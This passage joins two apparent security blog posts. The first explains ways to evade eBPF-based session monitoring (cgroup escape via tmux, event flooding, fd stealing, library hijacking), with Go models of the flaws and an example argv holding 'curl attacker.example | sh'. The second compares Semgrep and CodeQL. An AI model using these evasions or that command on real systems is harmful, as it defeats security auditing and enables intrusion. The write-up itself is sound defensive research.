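	return filepath.Base(alias), filepath.Base(resolved), nil
}

func main() {
	argName, resolvedName, err := demo()
	if err != nil {
		fmt.Println("demo failed:", err)
		return
	}
	fmt.Println("name taken from the path argument:", argName)
	fmt.Println("name after resolving symlinks:    ", resolvedName)
}
```

Resolving the path in user mode after the fact is still racy, so this only illustrates the discrepancy. It should not be read as a complete fix.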

1.2 Network bypasses

Not hooking all the network-related syscalls can have its own set of problems. Some monitoring solutions may only want to hook the EGRESS traffic, while an attacker could still send data to a non-allowed host abusing other network-sensitive operations (see aa_ops at linux/security/apparmor/include/audit.h:78) related to INGRESS traffic:

OP_BIND, the bind() function shall assign a local socket address to a socket identified by descriptor socket that has no local socket address assigned.
OP_LISTEN, the listen() function shall mark a connection-mode socket, specified by the socket argument, as accepting connections.
OP_ACCEPT, the accept() function shall extract the first connection on the queue of pending connections, create a new socket with the same socket type protocol and address family as the specified socket, and allocate a new file descriptor for that socket.
OP_RECVMSG, the recvmsg() function shall receive a message from a connection-mode or connectionless-mode socket.
OP_SETSOCKOPT, the setsockopt() function shall set the option specified by the option_name argument, at the protocol level specified by the level argument, to the value pointed to by the option_value argument for the socket associated with the file descriptor specified by the socket argument. Interesting options for attackers are SO_BROADCAST, SO_REUSEADDR, SO_DONTROUTE.

Generally, the network monitoring should look at all socket-based operations similarly to AppArmor.

In case the same local user has mixed monitored and unmonitored console sessions, it could be possible for an attacker in a monitored session to leverage open file descriptors and sockets to send data to restricted hosts. In 2020, Linux 5.6 introduced a new system call, pidfd_getfd, that can be used to achieve this. A small number of operating systems (like Ubuntu) enable the Yama kernel module, which limits file descriptor access to only child-parent processes. PoC code for using this function is available on GitHub (TheZ3ro/fdstealer).

2. Delayed execution

If only active console sessions are monitored, eBPF programs may only live for the time span of the session. By delaying the execution of a command (through sleep, timeout, sar, vmstat, inotifywait, at, cron …) and quitting the session, it could be possible to completely evade the solution.

3. Evade scoped event monitoring based on `cgroup`

A security monitoring solution may only be interested in auditing a specific user or cgroup (such as in the context of a remote console session). Taking Teleport as an example, it achieves this by correlating every event to a session with control groups (cgroupv2 in particular). Control grouping is a Linux kernel feature to limit access to resources to a group of processes. It is used in many containerization technologies (behind the scenes Docker creates a set of namespaces and control groups for the container) and its peculiarity is that all child processes will keep the id of the parent process. When Teleport starts an SSH session, it first re-launches itself and places itself within a cgroup. This allows not only that process, but all future processes that Teleport launches, to be tracked with a unique ID. The BPF programs that Teleport runs have been updated to also emit the cgroup ID of the program executing them. The BPF script checks the value returned by bpf_get_current_cgroup_id() and only cares about the important session cgroup. The simplest evasion to this auditing strategy would be changing your cgroup ID, but an attacker needs to be root to achieve this. Meddling with the cgroupv2 pseudo file system or abusing PAM configuration are also potential opportunities to affect the cgroup/session correlation.
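To see what this correlation depends on, it can help to look at a process's cgroup membership from user mode. The sketch below parses the contents of /proc/<pid>/cgroup, where a cgroup v2 entry has the form 0::/path, and compares two processes. It works on sample strings so it runs anywhere. The cgroup paths are made-up examples, and cgroupV2Path is a hypothetical helper, not part of Teleport.

```go
package main

import (
	"fmt"
	"strings"
)

// cgroupV2Path extracts the cgroup v2 path from the contents of
// /proc/<pid>/cgroup. Each line has the form
// "hierarchy-ID:controller-list:cgroup-path"; the v2 entry uses
// hierarchy ID 0 and an empty controller list.
func cgroupV2Path(procCgroup string) (string, bool) {
	for _, line := range strings.Split(procCgroup, "\n") {
		parts := strings.SplitN(line, ":", 3)
		if len(parts) == 3 && parts[0] == "0" && parts[1] == "" {
			return parts[2], true
		}
	}
	return "", false
}

func main() {
	// Sample contents (assumed paths, for illustration only).
	monitoredShell := "0::/teleport/session-1234\n"
	escapedProcess := "0::/user.slice/user-1000.slice\n"

	session, _ := cgroupV2Path(monitoredShell)
	other, _ := cgroupV2Path(escapedProcess)

	fmt.Println("monitored session cgroup:", session)
	fmt.Println("second process cgroup:   ", other)
	fmt.Println("attributed to the session:", session == other)
}
```

Any process whose membership no longer matches the session cgroup simply stops being attributed to the session, which is what the evasions in this section rely on.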

Another technique involves being reallocated by init. In the case of Teleport, when the bash process spawned by the session dies, its child processes become orphans and the Teleport process terminates its execution. When a child process becomes an orphan, it can be assigned to a different cgroup by the operating system under certain conditions (not having a tty, being a process group leader, joining a new process session). This allows an attacker to bypass the restrictions in place. The following PoC is an example of a bypass for this design:

Open a new eBPF-monitored session
Start tmux by executing the tmux command
Detach from tmux by pressing CTRL+B and then D
Kill the bash process that is tmux’s parent
Re-attach to the tmux process by executing tmux attach. The process tree will now look like this:

As another attack avenue, leveraging processes run by different local users/cgroupv2 on the machine (abusing other daemons, delegating systemd) can also help an attacker evade this. This aspect obviously depends on the system hosting the monitoring solution. Protecting against this is tricky, since even if PR_SET_CHILD_SUBREAPER is set to ensure that the descendants can’t re-parent themselves to init, if the ancestor reaper dies or is killed (DoS), then processes in that service can escape their cgroup “container”. Any compromise of this privileged service process (or malfeasance by it) allows it to kill its hierarchy manager process and escape all control.

4. Memory limits and loss of events

BPF programs have a lot of constraints. Only 512 bytes of stack space are reserved for the eBPF program. Variables will get hoisted and instantiated at the start of execution, and if the script tries to dump syscall arguments or pt-regs, it will run out of stack space very quickly. If no workaround for the instruction limit is in place, it could be possible to push the script into retrieving something too big to ever fit on the stack, losing visibility very soon when the execution gets complicated. But even when workarounds are used (e.g., using multiple probes to trace the same events but capture different data, or splitting the code into multiple programs that call each other using a program map), there still may be a chance to abuse it. BPF programs are not meant to run forever; they have to stop at some point. By way of example, if a monitoring solution is running on CentOS 7 and trying to capture a process’s arguments and its environment variables, the emitted event could have too many argv and too many envp entries. In that case, you may miss some of them because the loop stops early, and the event data will be truncated. It’s important to note that these limitations differ based on the kernel where BPF is being run, and how the endpoint agent is written.
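The truncation effect can be modeled in a few lines. The sketch below is plain Go, not eBPF: it imitates a probe that copies arguments in a bounded loop into fixed-size slots. The limits maxArgs and maxArgLen are arbitrary values chosen for the example, and captureArgs is a hypothetical name.

```go
package main

import "fmt"

const (
	maxArgs   = 4  // hypothetical loop bound on the number of arguments
	maxArgLen = 16 // hypothetical per-argument buffer size in bytes
)

// captureArgs imitates a bounded probe loop: it keeps at most maxArgs
// arguments and at most maxArgLen bytes of each. The second return
// value reports whether anything was cut off.
func captureArgs(argv []string) (captured []string, truncated bool) {
	for i, a := range argv {
		if i >= maxArgs {
			return captured, true
		}
		if len(a) > maxArgLen {
			a = a[:maxArgLen]
			truncated = true
		}
		captured = append(captured, a)
	}
	return captured, truncated
}

func main() {
	// The interesting arguments are placed after a few harmless ones.
	argv := []string{"sh", "-x", "-e", "-u", "-c", "curl attacker.example | sh"}

	got, cut := captureArgs(argv)
	fmt.Println("recorded:", got)
	fmt.Println("truncated:", cut)
}
```

With these limits, the part of the command line that matters never reaches the event. That is the kind of blind spot an attacker can aim for by padding argv or envp.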

Another peculiarity of eBPFs is that they’ll drop events if they can not be consumed fast enough, instead of dragging down the performance of the entire system with it. An attacker could abuse this by generating a sufficient number of events to fill up the perf ringbuffer and overwrite data before the agent can read it.
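The following sketch models that event loss with a tiny fixed-size ring in plain Go. It assumes an overwrite-oldest policy, which is only one of the possible buffer configurations, and the ring type and event strings are invented for the example.

```go
package main

import "fmt"

// ring is a fixed-size event buffer that overwrites the oldest unread
// event when it is full (assumed policy for this illustration).
type ring struct {
	buf   []string
	head  int // index of the oldest unread event
	count int // number of unread events
	lost  int // events overwritten before being read
}

func newRing(size int) *ring { return &ring{buf: make([]string, size)} }

// push stores an event, discarding the oldest one if there is no room.
func (r *ring) push(ev string) {
	if r.count == len(r.buf) {
		r.buf[r.head] = ev
		r.head = (r.head + 1) % len(r.buf)
		r.lost++
		return
	}
	r.buf[(r.head+r.count)%len(r.buf)] = ev
	r.count++
}

// drain returns the unread events, oldest first, and empties the ring.
func (r *ring) drain() []string {
	out := make([]string, 0, r.count)
	for i := 0; i < r.count; i++ {
		out = append(out, r.buf[(r.head+i)%len(r.buf)])
	}
	r.head, r.count = 0, 0
	return out
}

func main() {
	r := newRing(4)
	r.push("exec: curl attacker.example") // the event worth seeing

	// The attacker floods the buffer before the agent gets to read it.
	for i := 0; i < 8; i++ {
		r.push(fmt.Sprintf("exec: true #%d", i))
	}

	fmt.Println("events read by the agent:", r.drain())
	fmt.Println("events lost:", r.lost)
}
```

A slow consumer plus a burst of cheap events is enough to push the interesting event out before it is read.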

5. Never trust the userspace

The kernel-space understanding of a pid is not the same as the user-space understanding of a pid. If the eBPF script is trying to identify a file, the right way would be to get the inode number and device number, while a file descriptor won’t be as useful. Even in that case, probes could be subject to TOCTOU issues since they’ll be sending data to user mode that can easily change. If the script is instead tracing syscalls directly (using tracepoint or kprobe) it is probably stuck with file descriptors and it could be possible to obfuscate executions by playing around with the current working directory and file descriptors, (e.g., by combining fchdir, openat, and execveat).

6. Abuse the lack of `seccomp-bpf` & kernel discrepancies

eBPF-based monitoring solutions should protect themselves by using seccomp-BPF to permanently drop the ability to make the bpf() syscall before spawning a console session. If not, an attacker will have the ability to make the bpf() syscall to unload the eBPF programs used to track execution. Seccomp-BPF uses BPF programs to filter arbitrary system calls and their arguments (constants only, no pointer dereference).

Another thing to keep in mind when working with kernels, is that interfaces aren’t guaranteed to be consistent and stable. An attacker may abuse eBPF programs if they are not run on verified kernel versions. Usually, conditional compilation for a different architecture is very convoluted for these programs and you may find that the variant for your specific kernel is not targeted correctly. One common pitfall of using seccomp-BPF is filtering on system call numbers without checking the seccomp_data->arch BPF program argument. This is because on any architecture that supports multiple system call invocation conventions, the system call numbers may vary based on the specific invocation. If the numbers in the different calling conventions overlap, then checks in the filters may be abused. It is therefore important to ensure that the differences in bpf() invocations for each newly supported architecture are taken into account by the seccomp-BPF filter rules.
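The architecture pitfall can be shown with a small model of a filter decision. The sketch below is plain Go rather than a real seccomp-BPF program: seccompData mirrors only the nr and arch fields of struct seccomp_data, and the two filter functions are hypothetical. The constants are the Linux values for x86_64 and i386, where bpf() is syscall 321 and 357 respectively.

```go
package main

import "fmt"

const (
	auditArchX86_64 uint32 = 0xC000003E // AUDIT_ARCH_X86_64
	auditArchI386   uint32 = 0x40000003 // AUDIT_ARCH_I386

	nrBpfX86_64 = 321 // __NR_bpf on x86_64
	nrBpfI386   = 357 // __NR_bpf on i386
)

// seccompData mirrors the two fields of struct seccomp_data used here.
type seccompData struct {
	nr   int
	arch uint32
}

// naiveFilter blocks bpf() by number only and ignores the architecture.
// It returns true when the call is allowed.
func naiveFilter(d seccompData) bool {
	return d.nr != nrBpfX86_64
}

// archAwareFilter checks the architecture first, then the number that
// bpf() has under that calling convention. Unknown architectures are denied.
func archAwareFilter(d seccompData) bool {
	switch d.arch {
	case auditArchX86_64:
		return d.nr != nrBpfX86_64
	case auditArchI386:
		return d.nr != nrBpfI386
	default:
		return false
	}
}

func main() {
	// bpf() invoked through the 32-bit convention on a 64-bit kernel.
	call := seccompData{nr: nrBpfI386, arch: auditArchI386}

	fmt.Println("naive filter allows it:     ", naiveFilter(call))
	fmt.Println("arch-aware filter allows it:", archAwareFilter(call))
}
```

The naive variant is the pitfall described above: it encodes a syscall number that is only meaningful for one calling convention.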

7. Interfere with the agents

Similarly to (6), it may be possible to interfere with the eBPF program loading in different ways, such as targeting the eBPF compiler libraries (BCC’s libbcc.so) or adapting other shared libraries preloading methods to tamper with the behavior of legit binaries of the solution, ultimately performing harmful actions. In case an attacker succeeds in altering the solution’s host environment, they can prepend to LD_LIBRARY_PATH a directory containing a malicious library that has the same libbcc.so name and exports all the symbols used (to avoid a runtime linkage error). When the solution starts, instead of the legit bcc library, it gets linked with the malicious library. Defenses against this may include using statically linked programs, linking the library with the full path, or running the program in a controlled environment.

Many thanks to the whole Teleport Security Team, @FridayOrtiz, @Th3Zer0, & @alessandrogario for the inspiration and feedback while writing this blog post.

Comparing Semgrep and CodeQL

2022-10-06T00:00:00+02:00

Introduction

Recently, a client of ours asked us to put R2c’s Semgrep in a head-to-head test with GitHub’s CodeQL. Semgrep is open source and free (with premium options). CodeQL “is free for research and open source” projects and accepts open source contributions to its libraries and queries, but is not free for most companies. Many of our engineers had already been using Semgrep frequently, so we were reasonably familiar with it. On the other hand, CodeQL hadn’t gained much traction for our internal purposes given the strict licensing around consulting. That said, our client’s use case is not the same as ours, so what works for us, may not work well for them. We have decided to share our results here.

SAST background

A SAST tool generally consists of a few components: 1) a lexer/parser to make sense of the language, 2) rules which process the output produced by the lexer/parser to find vulnerabilities, and 3) tools to manage the output from the rules (tracking/ticketing, vulnerability classification, explanation text, prioritization, scheduling, third-party integrations, etc).

Difficulties in evaluating SAST tools

The rules are usually the source of most SAST complaints because, ultimately, we all hope that the tool produces perfect results, but that’s unrealistic. On one hand, you might get a tool that doesn’t find the bug you know is in the code (a false negative - FN) or on the other, it might return a bunch of useless supposed findings that are either lacking any real impact or potentially just plain wrong (a false positive - FP). This leads to our first issue when attempting to quantitatively measure how good a SAST tool is - what defines true/false or positives/negatives?

Some engineers might say a true positive is a demonstrably exploitable condition, while others would say matching the vulnerable pattern is all that matters, regardless of the broader context. Things are even more complicated for applications that incorporate vulnerable code patterns by design, for example, systems administration applications which execute shell commands via parameters passed in a web request. In most environments, this is the worst possible scenario. However, for these types of apps, it’s their primary purpose. In those cases, engineers are left with the subjective question of whether a finding is a true or false positive when an application’s users can execute arbitrary code in the application, but need to be fully and properly authenticated and authorized to do so.

These types of issues come from asking too much of the SAST application. We should focus on locating vulnerable code patterns, leaving it to people to vet and sort the findings. This is one of the places where the third set of components comes into play and can be a real differentiator between SAST applications. How users can ignore the same finding class(es), findings on the same code, or findings on certain paths, or ignore things conditionally, becomes very important for separating the signal from the noise. Typically, these tools become more useful for organizations that are willing to commit the time to configure the scans properly and refine the results, rather than spending it triaging a bunch of issues they didn’t want to see in the first place and becoming frustrated.

Furthermore, quantitative comparisons between tools can be problematic for several reasons. For example, if tool A finds numerous low severity bugs, but misses a high severity one, while tool B finds only a high severity bug, but misses all the low severity ones, which is the better tool? Numerically, tool A would score better, but most organizations would rather find the higher severity vulnerability. If tool A finds one high severity vulnerability and B finds a different one, but not the one A finds, what does it mean? Some of these questions can be handled with statistical methods, but most people don’t usually take this approach. Additionally, issues can come up when you’re in a multi-language environment where a tool works great on one language and not so great on the others. Yet another twist might be a tool missing a vulnerability because of a parsing error that would certainly be fixed in a later release, rather than because of a rule-matching issue specifically.
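
The tool A versus tool B dilemma can be made concrete with a small sketch. The severity weights and the finding lists below are hypothetical values chosen only for illustration; they are not results from our testing, and any real weighting would need to reflect an organization’s own priorities.

```javascript
// Hypothetical severity weights; the values are illustrative only.
const SEVERITY_WEIGHTS = { low: 1, medium: 5, high: 25 };

// Naive metric: every finding counts the same.
function rawCount(findings) {
  return findings.length;
}

// Severity-weighted metric: each finding contributes its weight.
// Unknown severities contribute nothing.
function weightedScore(findings, weights = SEVERITY_WEIGHTS) {
  return findings.reduce(
    (total, finding) => total + (weights[finding.severity] ?? 0),
    0
  );
}

// Tool A: ten low severity findings, misses the high severity bug.
const toolA = Array.from({ length: 10 }, (_, i) => ({
  id: `low-${i}`,
  severity: "low",
}));

// Tool B: only the single high severity finding.
const toolB = [{ id: "high-0", severity: "high" }];

console.log(rawCount(toolA), rawCount(toolB));
console.log(weightedScore(toolA), weightedScore(toolB));
```

With these assumed weights, tool A wins on raw count while tool B wins on weighted score, which is exactly why a single number rarely settles the comparison.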

These types of concerns don’t necessarily have easy answers and it’s important to remember that any evaluation of a SAST tool is subject to variations based on the language(s) being examined, which rules are configured to run, the code repository’s structure and contents, and any customizations applied to the rules or tool configuration.

Another hurdle in properly evaluating a SAST tool is finding a body of code on which to test it. If the objective is to simply scan the code and verify whether the findings are true positives (TP) or false positives (FP), virtually any supported code could work, but finding true negatives (TN) and false negatives (FN) requires prior knowledge of the security state of the code or having the code manually reviewed.

This then raises the question of how to quantify the negatives that a SAST tool can realistically discover. Broadly, a true positive is either a connection of a source and an unprotected sink or possibly a stand-alone configuration (e.g., disabling a security feature). So how do we count true negatives specifically? Do we count the total number of sources that lead to a protected sink, the total of protected sinks, the total safe function calls (regardless of whether they are identified sinks), and all the safe configuration options? Of course, if the objective is solely to verify the relative quality of detection between competing software, simply comparing the results, provided all things were reasonably equal, can be sufficient.

Our testing methodology

We utilized the OWASP Benchmark Project to analyze pre-classified Java application code to provide a more accurate head-to-head comparison of Semgrep vs. CodeQL. While we encountered a few bugs running the tools, we were able to work around them and produce a working test and meaningful results.

Both CodeQL and Semgrep came with sample code used to demonstrate the tool’s capabilities. We used the test suite of sample vulnerabilities from each tool to test the other, swapping the tested files “cross-tool”. This was done with the assumption that the test suite for each tool should return 100% accurate results for the original tool, by design, but not necessarily for the other. Some modifications and omissions were necessary however, due to the organization and structure of the test files.

We also ran the tools against a version of our client’s code in the manner that required the least amount of configuration and/or knowledge of the tools. This was intended to show what you get “out of the box” for each tool. We iterated over several configurations of the tools and their rules, until we came to a meaningful, yet manageable set of results (due to time constraints).

Assigning importance

When comparing SAST tools, based on past experience, we feel these criteria are important aspects that need to be examined.

Language and framework support
Lexer/Parser functionality
Pre/post scan options (exclusions, disabling checks, filtering, etc.)
Rules
Findings workflows (internal tracking, ticket system integration, etc.)
Scan times

Language and framework support

The images below outline the supported languages for each tool. Refer to the source links for additional information about the supported frameworks:

Semgrep:

Source: https://semgrep.dev/docs/supported-languages/

CodeQL:

Source: https://codeql.github.com/docs/codeql-overview/supported-languages-and-frameworks/

Not surprisingly, we see support for many of the most popular languages in both tools, but Semgrep supports a larger number, both in GA and under development. Generally speaking, this gives an edge to Semgrep, but practically speaking, most organizations only care if it supports the language(s) they need to scan.

Lexer/Parser functionality

Lexer/parser performance will vary based on the language and framework, their versions and code complexity. It is only possible to get a general sense of this by scanning numerous repositories and monitoring for errors or examining the source of the parser and tool.

During testing on various applications, both tools encountered errors allowing only the partial parsing of many files. The thoroughness of the parsing results varied depending on the tool and on the code being analyzed. Testing our client’s Golang project, we did occasionally encounter parsing errors with both as well.

Semgrep:

We encountered an issue when testing against third-party code where a custom function (exit()) was declared and used, despite being reserved, causing the parser to fail once the function was reached, due to invalid syntax. The two notable things here are that the code should theoretically not work properly and that despite this, Semgrep was still able to perform a partial examination. Semgrep excelled in terms of the ability to handle incomplete code or code with errors as it operates on a single file scope generally.

CodeQL:

CodeQL works a bit differently, in that it effectively creates a database from the code, allowing you to then write queries against that database to locate vulnerabilities. In order for it to do this, it requires a fully buildable application. This inherently means that it must be more strict with its ability to parse all the code.

In our testing, CodeQL generated errors on the majority of files that it had findings for (partial parsing at best), and almost none were analyzed without errors. Roughly 85% of files generated some errors during database creation.

According to CodeQL, a small number of extraction errors is normal, but a large number is not. It was unclear how to reduce the large number of extraction errors. According to CodeQL’s documentation, the only ways were to wait for CodeQL to release a fixed version of the extractor or to debug using the logs. We attempted to debug with the logs, but the error messages were not completely clear and it seemed that the two most common errors were related to the package names declared at the top of the files and variables being re-declared. It was not completely clear if these errors were due to an overly strict extractor or if the code being tested was incomplete.

Semgrep would seem to have the advantage here, but it’s not a completely fair comparison, due to the different modes of operation.

Pre/post scan options

Semgrep:

Among the options you can select when firing up a Semgrep scan are:

Choosing which rules, or groups of rules, to run, or allowing automatic selection
- Semgrep registry rules (remote community and r2c created; currently 973 rules)
- Local custom rules and/or “ephemeral” rules passed as an argument on the command line
- A combination of the above
Choosing which languages to examine
A robust set of filtering options to include/exclude files, directories and specific content
Ability to configure a comparison baseline (find things not already in commit X)
Whether to continue if errors or vulnerabilities are encountered
Whether to automatically perform fixes by replacing text and whether to perform dry runs to check before actually changing
The maximum size of the files to scan
Output formats

Notes:

While the tool does provide an automated scanning option, we found situations in which --config auto did not find all the vulnerabilities that manually selecting the language did.
The re-use/tracking of the scan results requires using Semgrep CI or Semgrep App.

CodeQL:

CodeQL requires a buildable application (i.e., no processing of a limited set of files), with a completely different concept of “scanning”, so this notion doesn’t directly translate. In effect, you create a database from the code, which you subsequently query to find bugs, so much of the “filtering” can be accomplished by modifying the queries that are run.

Options include:

Specifying which language(s) to process
- The CodeQL repository contains libraries and specific queries for each language
- The Security folder contains (21) queries for various CWEs
Which queries to run
Location of the files
When the queries are run on the resulting database you can specify the output format
Adjustable verbosity when creating the database(s)

Because CodeQL creates a searchable database, you can indefinitely run queries against the scanned version of the code.

Because of the different approaches it is difficult to say one tool has an advantage over the other. The most significant difference is probably that Semgrep allows you to automatically fix vulnerabilities.

Rules

As mentioned previously, these tools take completely different approaches (i.e., rules vs queries). Whether someone prefers writing queries vs. YAML is subjective, so we’ll not discuss the formats themselves specifically.

Semgrep:

As primarily a string-matching static code analysis tool, Semgrep’s accuracy is mostly driven by the rules in use and their modes of operation. Semgrep is probably best thought of as an improvement on the Linux command line tool grep. It adds improved ease of use, multi-line support, metavariables and taint tracking, as well as other features that grep directly does not support. Beta features also include the ability to track across related files.

Semgrep rules are defined in relatively simple YAML files with only a handful of elements used to create them. This allows someone to become reasonably proficient with the tool in a matter of hours, after reading the documentation and tutorials. At times, the tool’s less than full comprehension of the code can cause rule writing to be more difficult than it might appear at first glance.

In Semgrep, there are several ways to execute rules, either locally or remotely. Additionally, you can pass them as command line arguments referred to as “ephemeral” rules, eliminating the YAML files altogether.

The rule below shows an example of a reasonably straightforward rule. It effectively looks for an insecure comparison of something that might be a secret within an HTTP request.

rules:
  - id: insecure-comparison-taint
    message: >-
      User input appears to be compared in an insecure manner that allows for side-channel timing attacks. 
    severity: ERROR
    languages: [go]
    metadata:
      category: security
    mode: taint
    pattern-sources:
      - pattern-either:
          - pattern: "($ANY : *http.Request)"
          - pattern: "($ANY : http.Request)"
    pattern-sinks:
      - patterns:
          - pattern-either: 
            - pattern: "... == $SECRET"
            - pattern: "... != $SECRET"
            - pattern: "$SECRET == ..."
            - pattern: "$SECRET != ..."
          - pattern-not: len(...) == $NUM
          #- pattern-not: <... len(...) ...>
          - metavariable-regex:
              metavariable: $SECRET
              regex: .*(secret|password|token|otp|key|signature|nonce).*
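
To make the bug class behind this rule concrete, here is a minimal sketch of the insecure and safer comparison patterns. The rule above targets Go, where crypto/subtle’s ConstantTimeCompare would be the usual fix; the sketch below uses JavaScript (Node.js) purely for illustration, and the function names are assumptions made for this example.

```javascript
const crypto = require("node:crypto");

// Insecure pattern: a plain equality check may return as soon as the
// values differ, so response time can leak how much of the secret matched.
function insecureEquals(supplied, secret) {
  return supplied === secret;
}

// Safer pattern: hash both values to a fixed length first (timingSafeEqual
// throws on inputs of different lengths), then compare in constant time.
function constantTimeEquals(supplied, secret) {
  const a = crypto.createHash("sha256").update(String(supplied)).digest();
  const b = crypto.createHash("sha256").update(String(secret)).digest();
  return crypto.timingSafeEqual(a, b);
}
```

Both functions return the same boolean for the same inputs; only the timing behavior differs, which is why a pattern-based rule is a reasonable way to surface candidates for manual review.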

The logic in the rules is familiar and amounts to what feels like stacking of RegExs, but with the added capability of creating boundaries around what is matched against and with the benefit of language comprehension. It is important to note, however, that Semgrep lacks an understanding of the code flow sufficient to trace source-to-sink flows through complex code. By default it works on a single file basis, but Beta features also include the ability to track across related files. Semgrep’s current capabilities lie somewhere between basic grep and a traditional static code analysis tool, with abstract syntax trees and control flow graphs.

No special preparation of repositories is needed before scanning can begin. The tool is fully capable of detecting languages and running simultaneous scans of multiple languages in heterogeneous code repositories. Furthermore, the tool is capable of running on code which isn’t buildable, but the tool will return errors when it parses what it deems as invalid syntax.

That said, rules tend to be more general than the queries in CodeQL and could potentially lead to more false positives. For some situations, it is not possible to make a rule that is completely accurate without customizing the rule to match a specific code base.

CodeQL:

CodeQL’s query language has a SQL-like syntax with the following features:

Logical: all the operations in QL are logical operations.
Declarative: provide the properties the results must satisfy rather than the procedure to compute the results.
Object-oriented: it uses classes, inheritance and other object oriented features to increase modularity and reusability of the code.
Read-only: no side effect, no imperative features (ex. variable assignment).

The engine has extractors for each supported language. They are used to extract the information from the codebase into the database. Multi-language code bases are analyzed one language at a time. Trying to specify a list of target languages (go, javascript and c) didn’t work out of the box because CodeQL required the build command to be set explicitly for this combination of languages.

CodeQL can also be used in VSCode as an extension, as a CLI tool or integrated with GitHub workflows. The VSCode extension allows writing the queries with the support of the IDE’s autocompletion and testing them against one or more previously created databases.

The query below shows how you would search for the same vulnerability as the Semgrep rule above.

/**
 * @name Insecure time comparison for sensitive information
 * @description Input appears to be compared in an insecure manner (timing attacks)
 */


import go

from EqualityTestExpr e, DataFlow::CallNode called
where
  // Match calls where the text of any argument matches the RegEx
  called
      .getAnArgument()
      .toString()
      .toLowerCase()
      .regexpMatch(".*(secret|password|token|otp|key|signature|nonce).*") and
  // ... and whose result is an operand of an equality test (== or !=)
  e.getAnOperand() = called.getExpr()
select called.getExpr(), "Use a constant time comparison for sensitive information"

In order to create a database, CodeQL requires a buildable codebase. This means that an analysis consists of multiple steps: standard building of the codebase, creating the database and querying the codebase. Due to the complexity of the process in every step, our experience was that a full analysis can require a non-negligible amount of time in some cases.

Writing queries for CodeQL also requires a great amount of effort, especially at the beginning. The user should know the CodeQL syntax very well and pay attention to the structure of the condition to avoid killing the performance. In one case, the compilation never finished after we simply added an OR condition to the WHERE clause of a query. Starting from zero experience with the tool, the benefits of using CodeQL are perceivable only in the long run.

Findings workflows

Semgrep:

As Semgrep allows you to output to a number of formats, along with the CLI output, there are a number of ways you can manage the findings. They also list some of this information on their manage-findings page.

CodeQL:

Because the CodeQL CLI tool reports findings in a CSV or SARIF file format, triaging findings reported by it can be quite tedious. During testing, we felt the easiest way to review findings from the CodeQL CLI tool was to launch the query from Visual Studio Code and manually review the results from there (due to the IDE’s navigation features). Ultimately, in real-world usage, the results are probably best consumed through the integration with GitHub.

Scan times

Due to the differences between their approaches, it’s difficult to fairly quantify the differences in speed between the two tools. Semgrep is a clear winner in the time it takes to set up, run a scan and get results. It doesn’t interpret the code as deeply as CodeQL does, nor does it have to create a persistent searchable database, then run queries against it. However, once the database is created, you could argue that querying for a specific bug in CodeQL versus scanning a project again in Semgrep would be roughly similar, depending on multiple factors not directly related to the tools (e.g., hardware, language, code complexity).

This highlights the fact that tool selection criteria should incorporate the use-case.

Scanning in a CI/CD pipeline - speed matters more
Ongoing periodic scans - speed matters less
Time based consulting work - speed is very important

OWASP Benchmark Project results

This section shows the results of using both of these SAST tools to test the same repository of Java code (the only language option). This project’s sample code had been previously reviewed and categorized, specifically to allow for benchmarking of SAST tools. Using this approach we could relatively easily run a head-to-head comparison and allow the OWASP Benchmark Project to score and graph the performance of each tool.

Drawbacks to this approach include the fact that it is one language, Java, and that is not the language of choice for our client. Additionally, SAST tool maintainers, who might be aware of this project, could theoretically ensure their tools perform well in these tests specifically, potentially masking shortcomings when used in broader contexts.

In this test, Semgrep was configured to run with the latest “security-audit” Registry ruleset, per the OWASP Benchmark Project recommendations. CodeQL was run using the “Security-and-quality queries” query suite. The CodeQL query suite includes queries from “security-extended”, plus maintainability and reliability queries.

As you can see from the charts below, Semgrep performed better, on average, than CodeQL did. Examining the rules a bit more closely, we see three CWE (Common Weakness Enumeration) areas where CodeQL does not appear to find any issues, significantly impacting the average performance. It should also be noted that CodeQL does outperform in some categories, but determining the per-category importance is left to the tool’s users.
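
For readers unfamiliar with this kind of scoring, the sketch below shows one way a per-category score and its average can be computed from TP/FP/TN/FN counts. It assumes the score is the true positive rate minus the false positive rate, which is our understanding of how the OWASP Benchmark scores tools; the category names and counts are hypothetical and are not our measured results.

```javascript
// Compute the true positive rate, false positive rate and a
// Benchmark-style score (assumed here to be TPR - FPR) for one category.
function rates({ tp, fp, tn, fn }) {
  const tpr = tp + fn === 0 ? 0 : tp / (tp + fn);
  const fpr = fp + tn === 0 ? 0 : fp / (fp + tn);
  return { tpr, fpr, score: tpr - fpr };
}

// Average the per-category scores.
function averageScore(categories) {
  const scores = Object.values(categories).map((c) => rates(c).score);
  return scores.reduce((sum, s) => sum + s, 0) / scores.length;
}

// Hypothetical counts: one category handled well, one where the tool
// reports nothing at all.
const exampleCategories = {
  "hypothetical-category-1": { tp: 80, fp: 20, tn: 80, fn: 20 },
  "hypothetical-category-2": { tp: 0, fp: 0, tn: 100, fn: 100 },
};

console.log(averageScore(exampleCategories));
```

A category in which a tool reports nothing scores zero under this assumption, so a few such categories pull the average down noticeably even when the tool does well elsewhere.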

Cross-tool test suite results

This section discusses the results of using the Semgrep tool against the test cases for CodeQL and vice versa. While initially seeming like a great way to compare the tools, unfortunately, the test case files presented several challenges to this approach. While being labeled things like “Good” and “Bad” either in file names or comments, the files were not necessarily all “Good” code or “Bad” code, but inconsistently mixed, inconsistently labeled and sometimes with multiple potential vulnerabilities in the same files. Additionally, we occasionally discovered vulnerabilities in some of the files which were not the CWE classes that were supposed to be in the files (e.g., finding XSS in an SQL Injection test case).

These issues prevented a simple count based on the files that were/were not found to have vulnerabilities. The statistics we present have been modified as much as possible in the allotted time to account for these issues and we have applied data analysis techniques to account for some of the errors.

As you can see in the table below, CodeQL performed significantly better with regard to detection, but at the cost of a higher false positive rate as well. This underscores some of the potential tradeoffs, mentioned in the introduction, which need to be considered by the consumer of the output.

Notes:

Semgrep’s configuration was limited to only running rules classified as security-related and only against Golang files, for efficiency’s sake.
Semgrep successfully identified vulnerabilities associated with CWE-327, CWE-322 and CWE-319.
Semgrep’s results only included two vulnerabilities which were the ones intended to be found in the file (e.g., test for X, find X). The remainder were HTTPS issues (CWE-319) related to servers configured for testing purposes in the CodeQL rules (e.g., test for X, but find valid Y instead).
CodeQL rules for SQL injection did not perform well in this case (~20% detection), but did better in cross-site scripting and other tests. There were fewer overall rules available during testing, compared to Semgrep, and vulnerability classes like Server Side Template Injection (SSTI) were not checked for, due to the absence of rules.
Out of 14 files that CodeQL generated findings for, only 2 were analyzed without errors. 85% of files generated some errors during database creation.
False negative rates can increase dramatically if CodeQL fails to extract data from code. It is essential to make sure that there are not excessive extraction errors when creating a database or running any of the commands that implicitly run the extractors.

